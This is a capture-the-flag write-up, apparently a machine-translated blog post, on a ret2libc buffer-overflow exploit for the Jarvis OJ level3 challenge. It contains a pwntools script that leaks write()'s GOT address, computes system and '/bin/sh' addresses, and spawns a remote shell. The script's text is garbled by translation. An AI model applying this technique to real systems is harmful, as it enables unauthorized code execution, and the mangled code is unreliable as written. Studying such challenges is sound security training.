Jarvis OJ-[XMAN]LEVEL3-WRITEUP--ROP2LIBC try

This time besides the ELF program comes with a dynamic link library

Look first, very general protection.

Thinking analysis

Viewed in Ida, you can determine the overflow by entering BUF with the Read function, but you do not see the appropriate target function

But using Ida to open the accompanying library of links, you can see that both the system function and the "/bin/sh" string exist

So the idea is defined as the Read function overflow->system function, adding the parameter "/bin/sh"

Write, system, and/bin/sh offsets can be obtained through the libc.so file, but the address of system and/bin/sh in memory is unknown

The function has an in-memory address of FUNC_ADDR, and is offset to func_libc in libc.

　　　　　　SYS_ADDR-SYS_LIBC = = WRITE_ADDR-WRITE_LIBC

So we can get the address of the system by leaking the address of the write function, using the difference between the function's in- memory address and the offset in the libc file .

Constructs the stack frame, the overflow target is System ("/bin/sh"), gets the shell

Methodology

To get the address of system and bin using offset equality, first disclose the real address of the write

You can get its real address by printing the address of the write in the Got table

So the first thing to do is to output the address of Write_got

So first construct the stack frame, first print by overflow write function write_got

Then return to the VULN function to execute read again, implement two overflows to system, and eventually get the shell

Exp

#!usr/bin/env python#Encoding:utf-8 fromPwnImport*#IO = Process ("./level3")IO = Remote ("pwn2.jarvisoj.com", 9879) Elf= ELF ("./level3") Writeplt= elf.plt["Write"] #plt和got都在可执行程序中writegot= elf.got["Write"]func= elf.symbols["vulnerable_function"]LIBC= ELF ("./libc-2.19.so") WRITELIBC= libc.symbols["Write"] #libc中可以找到程序中有的/No offset of the function syslibc= libc.symbols["system"]BINLIBC= Libc.search ("/bin/sh"). Next () Payload1='a'* 0x88 +'F**k'+ P32 (WRITEPLT) + P32 (func) + P32 (1) +p32 (writegot) +P32 (4) #溢出地址 + return address + parameter Io.recvuntil ("input:\n") Io.sendline (payload1) writeaddr= U32 (IO.RECV (4) #由于python没有指针, cannot be *write_got, it needs to be output and saved sysaddr= WRITEADDR-WRITELIBC +syslibc #利用偏移量相等获得其真实地址binaddr= WRITEADDR-WRITELIBC +binlibcpayload2='a'* 0x88 +'F**k'+ P32 (sysaddr) + P32 (func) +P32 (binaddr) io.recvuntil ("input:\n") Io.sendline (payload2) io.interactive () io.close ()

Add

@m4x Seniors reminded that the local runtime priority installed in the local system of the LIBC library, resulting in the actual loading library is not

Cause local address error, but remote is not a problem

You can first make if judgments, link different libraries to solve

Spicy Chicken with small spectrum
Source: http://www.cnblogs.com/WangAoBo/
If there is reproduced, the pleasure! Please mark the source;

Jarvis OJ-[XMAN]LEVEL3-WRITEUP--ROP2LIBC try